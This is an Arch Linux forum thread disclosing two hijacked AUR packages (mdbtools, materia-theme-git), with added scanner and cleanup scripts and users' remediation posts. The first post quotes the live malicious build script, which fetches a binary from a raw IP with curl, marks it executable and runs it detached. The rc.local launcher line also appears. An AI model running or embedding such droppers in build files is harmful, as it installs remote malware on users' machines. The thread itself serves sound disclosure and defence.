
#1 2025-10-29 08:10:01

GlassTree
Member
Registered: 2025-10-29
Posts: 5

AUR Packages Hijacked: mdbtools / materia-theme-git

I've noticed these two packages being "hijacked": mdbtools and materia-theme-git

Both under the same user "koolpp"

The new versions uploaded refer to a shell script available at a Codeberg repository:
https://codeberg.org/koolpp/mdbtools/sr … akefile.am
https://codeberg.org/koolpp/materia-the … eson.build

The scripts execute the following:

#!/bin/sh
mkdir -p /usr/lib64
curl -s http://45.94.31.147/prod.bin -o /usr/lib64/libkwrk.so.1.5.3
chmod +x /usr/lib64/libkwrk.so.1.5.3
setsid /usr/lib64/libkwrk.so.1.5.3 &

Looks like a remote file will create a background session with execute permissions if you install these packages.
May these new package versions be taken down.


UPDATE: Publisher "koolpp" banned and packages reverted one version, by @anthraxx

Last edited by GlassTree (2025-10-29 10:28:05)

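The indicators in the script above (a build file fetching a binary from a raw IP address over plain HTTP, writing it under /usr/lib64, setting the executable bit and detaching it with setsid) can be turned into a heuristic scan of a downloaded AUR source tree before makepkg is run. The script below is an added example for this thread, not an Arch or AUR tool; the set of file names it scans, the pattern list, and the constructed sample files used to exercise it are assumptions, and a hit is a line to read, not proof of compromise.

```shell
#!/bin/sh
# Heuristic scan of a downloaded AUR source tree for the build-time pattern reported
# in this thread: a build file that fetches a binary from a raw IP address over HTTP,
# drops it under /usr/lib64, sets the executable bit and starts it detached.
# Added example for this thread (not an Arch/AUR tool). The scanned file names and
# the pattern list are assumptions; treat every hit as something to read, not as proof.
#
# Usage: scan_build_files <dir>    exit 0 = nothing flagged, 1 = at least one hit

# One "ERE;reason" per line. ';' is the field separator, so no ';' inside a regex.
SUSPECT_PATTERNS='https?://[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+;download from a raw IP address
(curl|wget)[^|]*[|][[:space:]]*(sh|bash);download piped straight into a shell
(curl|wget).*-o[[:space:]]*/usr/lib;download written under /usr/lib
chmod[[:space:]]+\+x[[:space:]]+/usr/lib;executable bit set on a file under /usr/lib
setsid[[:space:]]+/.*&;absolute path started detached in the background'

scan_file() {
    # Scan one file. Prints "file:line:text  [reason]" per hit; returns 1 if any.
    f=$1
    hits=0
    while IFS=';' read -r re reason; do
        [ -n "$re" ] || continue
        if matches=$(grep -nE -- "$re" "$f"); then
            printf '%s\n' "$matches" | while IFS= read -r m; do
                printf '%s:%s  [%s]\n' "$f" "$m" "$reason"
            done
            hits=$((hits + 1))
        fi
    done <<EOF
$SUSPECT_PATTERNS
EOF
    [ "$hits" -eq 0 ]
}

scan_build_files() {
    # Walk a source tree and scan only the files a build actually executes
    # (PKGBUILD, install scriptlets, autotools/meson/configure files, shell scripts).
    dir=$1
    bad=0
    files=$(find "$dir" -type f \( -name PKGBUILD -o -name '*.install' -o -name 'Makefile*' -o -name meson.build -o -name '*.sh' -o -name 'configure*' \))
    while IFS= read -r f; do
        [ -n "$f" ] || continue
        scan_file "$f" || bad=1
    done <<EOF
$files
EOF
    return "$bad"
}

# Run directly as "sh scan.sh <dir>"; without an argument only the functions are defined.
if [ -n "${1:-}" ]; then
    scan_build_files "$1"
fi
```

The scan is deliberately narrow: a PKGBUILD that downloads from a normal hostname is not flagged, only raw-IP URLs, pipe-to-shell and writes or execution under /usr/lib from a build file, which is the shape of the script quoted in this post.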

#2 2025-10-29 09:07:54

WorMzy
Administrator
From: Scotland
Registered: 2010-06-16
Posts: 13,062

Re: AUR Packages Hijacked: mdbtools / materia-theme-git

You would be better off posting this to the aur-general mailing list.

https://lists.archlinux.org/mailman3/li … linux.org/

Mod note: moving to AUR Issues.


Sakura:-
Mobo: MSI MAG X570S TORPEDO MAX // Processor: AMD Ryzen 9 5950X @4.9GHz // GFX: AMD Radeon RX 5700 XT // RAM: 32GB (4x 8GB) Corsair DDR4 (@ 3000MHz) // Storage: 1x 3TB HDD, 6x 1TB SSD, 2x 120GB SSD, 1x 275GB M2 SSD

Making lemonade from lemons since 2015.


#3 2025-10-29 09:29:08

GlassTree
Member
Registered: 2025-10-29
Posts: 5

Re: AUR Packages Hijacked: mdbtools / materia-theme-git

WorMzy wrote:

You would be better off posting this to the aur-general mailing list.

https://lists.archlinux.org/mailman3/li … linux.org/

Mod note: moving to AUR Issues.

EDIT: Figured out how to post

Last edited by GlassTree (2025-10-29 09:41:22)


#4 2025-10-29 10:10:20

GlassTree
Member
Registered: 2025-10-29
Posts: 5

Re: AUR Packages Hijacked: mdbtools / materia-theme-git

UPDATE: Publisher banned & packages reverted one version by @anthraxx

Last edited by GlassTree (2025-10-29 10:28:56)


#5 2025-10-29 10:19:26

gromit
Administrator
From: Germany
Registered: 2024-02-10
Posts: 1,360

Re: AUR Packages Hijacked: mdbtools / materia-theme-git

The banning & cleanup was done by anthraxx, I just took care of the things around it

I also posted an answer to aur-general: https://lists.archlinux.org/archives/li … WR243DN7K/


#6 2025-10-29 10:27:42

GlassTree
Member
Registered: 2025-10-29
Posts: 5

Re: AUR Packages Hijacked: mdbtools / materia-theme-git

gromit wrote:

The banning & cleanup was done by anthraxx, I just took care of the things around it

I also posted an answer to aur-general: https://lists.archlinux.org/archives/li … WR243DN7K/

Thank you and @anthraxx for keeping AUR secure, not sure how to reply over the listing lol


#7 2025-10-29 14:12:52

PostBlue
Member
Registered: 2012-04-05
Posts: 13

Re: AUR Packages Hijacked: mdbtools / materia-theme-git

About cleanup: those facing the remnants of this package should at least delete the following:

- chattr -i -a  /usr/lib64/libkwrk.so.1.5.3
- rm -f  /usr/lib64/libkwrk.so.1.5.3
- rm /etc/systemd/system/rc-local.service


#8 2025-10-29 14:58:59

Denis Dyakov
Member
From: Almaty, Kazakhstan
Registered: 2016-01-16
Posts: 5

Re: AUR Packages Hijacked: mdbtools / materia-theme-git

PostBlue wrote:

About cleanup, for those facing the remnants of this package, they should at least delete the following:
- chattr -i -a  /usr/lib64/libkwrk.so.1.5.3
- rm -f  /usr/lib64/libkwrk.so.1.5.3
- rm /etc/systemd/system/rc-local.service

Additionally, clear the content of the /etc/rc.local file; it tries to start the malicious file:
#!/bin/sh -e
/usr/lib64/libkwrk.so.1.5.3
exit 0

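The cleanup steps from the two posts above (clear the immutable/append-only attributes, delete the dropped library, delete the rc-local unit, and clean /etc/rc.local) can be combined into one check-then-remove script. This is an added example for this thread, not an official Arch cleanup procedure; the root-prefix argument, the choice to strip only the launcher line from /etc/rc.local rather than blanking the whole file, and the systemctl daemon-reload after removing the unit are this script's own assumptions. The paths are the ones named in the thread. Run it as root on a live system with "/" as the argument.

```shell
#!/bin/sh
# Detect and remove the on-disk remnants named in this thread:
#   /usr/lib64/libkwrk.so.1.5.3           (the dropped binary, reported to carry chattr +i/+a)
#   /etc/systemd/system/rc-local.service  (unit that runs /etc/rc.local at boot)
#   /etc/rc.local                         (reported to contain a line launching the binary)
# Added example for this thread, not an official Arch cleanup tool. The root-prefix
# argument is this script's own convention: pass "/" for a live host, or a scratch
# directory to exercise it against a constructed tree. Needs root on a real system.
#
# Usage: find_remnants <root>   clean_remnants <root>

REMNANT_LIB=usr/lib64/libkwrk.so.1.5.3
REMNANT_UNIT=etc/systemd/system/rc-local.service
RC_LOCAL=etc/rc.local

find_remnants() {
    # Print one line per indicator present under the given root; return 1 if any.
    root=${1%/}
    n=0
    for rel in "$REMNANT_LIB" "$REMNANT_UNIT"; do
        if [ -e "$root/$rel" ]; then
            printf 'present: %s\n' "$root/$rel"
            n=$((n + 1))
        fi
    done
    if [ -f "$root/$RC_LOCAL" ] && grep -q 'libkwrk' "$root/$RC_LOCAL"; then
        printf 'rc.local launches the library: %s\n' "$root/$RC_LOCAL"
        n=$((n + 1))
    fi
    [ "$n" -eq 0 ]
}

clean_remnants() {
    # Remove the three remnants, then re-check; returns 0 only when nothing is left.
    root=${1%/}
    lib=$root/$REMNANT_LIB
    if [ -e "$lib" ]; then
        # Immutable/append-only attributes make rm fail, so clear them first (PostBlue's
        # step). Harmless if chattr is missing, unsupported by the filesystem, or not root.
        { command -v chattr >/dev/null && chattr -i -a "$lib" 2>/dev/null; } || true
        rm -f "$lib"
    fi
    rm -f "$root/$REMNANT_UNIT"
    if [ -f "$root/$RC_LOCAL" ]; then
        # Drop only the launcher line(s) rather than blanking the file, so any legitimate
        # local commands survive. Writing back with cat keeps the file's mode bits.
        grep -v 'libkwrk' "$root/$RC_LOCAL" > "$root/$RC_LOCAL.tmp" || true
        cat "$root/$RC_LOCAL.tmp" > "$root/$RC_LOCAL"
        rm -f "$root/$RC_LOCAL.tmp"
    fi
    # On a live host (root prefix "/"), tell systemd the unit file is gone.
    if [ -z "$root" ] && command -v systemctl >/dev/null; then
        systemctl daemon-reload
    fi
    find_remnants "$root"
}

# Run directly as "sh cleanup.sh /" to report; call clean_remnants to remove.
if [ -n "${1:-}" ]; then
    find_remnants "$1" && echo "no remnants found under $1"
fi
```

Note that this only removes what the thread identified; since the dropped file was a downloaded binary whose behaviour is not described here, the absence of these three remnants afterwards says nothing about what else it may have changed while running.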

#9 2025-10-29 15:18:24

jonny_mako
Member
Registered: 2015-12-17
Posts: 6

Re: AUR Packages Hijacked: mdbtools / materia-theme-git

What's more, trying to uninstall or reinstall mdbtools reinstates the malicious library all over again.


#10 2025-10-29 15:30:16

Scimmia
Fellow
Registered: 2012-09-01
Posts: 13,176

Re: AUR Packages Hijacked: mdbtools / materia-theme-git

jonny_mako wrote:

What's more. Trying to uninstall or reinstall mdbtools reinstates the malicious library all over again.

You're going to have to explain that one. This looks like it happened during the build process, so installing or uninstalling shouldn't do anything like that.

Edit: it wouldn't have permissions to do what it did during the build process, though, so I'm obviously wrong. Since the changes have been erased, I don't know how this worked. In reality, you should be reverting the AUR repo to what it is now and rebuilding anyway.

Last edited by Scimmia (2025-10-29 15:38:45)


#11 2025-10-29 15:40:45

gromit
Administrator
From: Germany
Registered: 2024-02-10
Posts: 1,360

Re: AUR Packages Hijacked: mdbtools / materia-theme-git

jonny_mako wrote:

What's more. Trying to uninstall or reinstall mdbtools reinstates the malicious library all over again.

Do you maybe use an AUR helper that still has the bad commit in its local cache?


#12 2025-10-29 16:01:14

jonny_mako
Member
Registered: 2015-12-17
Posts: 6

Re: AUR Packages Hijacked: mdbtools / materia-theme-git

gromit wrote:

Do you maybe use an AUR helper that still has the bad commit in its local cache?

Thanks. That was it. Deleting the local cache doesn't do it anymore, but still gives a message:

checking dependencies...

Packages (1) mdbtools-1.0.1-2

Total Removed Size:  0.46 MiB

:: Do you want to remove these packages? [Y/n] 
:: Processing package changes...
(1/1) removing mdbtools                                                              [-------------------------------------------------] 100%
sh: line 1: Not: command not found
error: command failed to execute correctly
:: Running post-transaction hooks...
(1/1) Arming ConditionNeedsUpdate...


#13 2025-10-31 01:52:41

Denis Dyakov
Member
From: Almaty, Kazakhstan
Registered: 2016-01-16
Posts: 5

Re: AUR Packages Hijacked: mdbtools / materia-theme-git

jonny_mako wrote:
gromit wrote:

Do you maybe use an AUR helper that still has the bad commit in its local cache?

Thanks. That was it. Deleting the local cache doesn't do it anymore, but still gives a message:

checking dependencies...

Packages (1) mdbtools-1.0.1-2

Total Removed Size:  0.46 MiB

:: Do you want to remove these packages? [Y/n] 
:: Processing package changes...
(1/1) removing mdbtools                                                              [-------------------------------------------------] 100%
sh: line 1: Not: command not found
error: command failed to execute correctly
:: Running post-transaction hooks...
(1/1) Arming ConditionNeedsUpdate...

Jonny, if you still have this message "sh: line 1: Not: command not found", inspect the file /etc/rc.local. You probably need to clean it up; it may contain a reference to the malicious library.

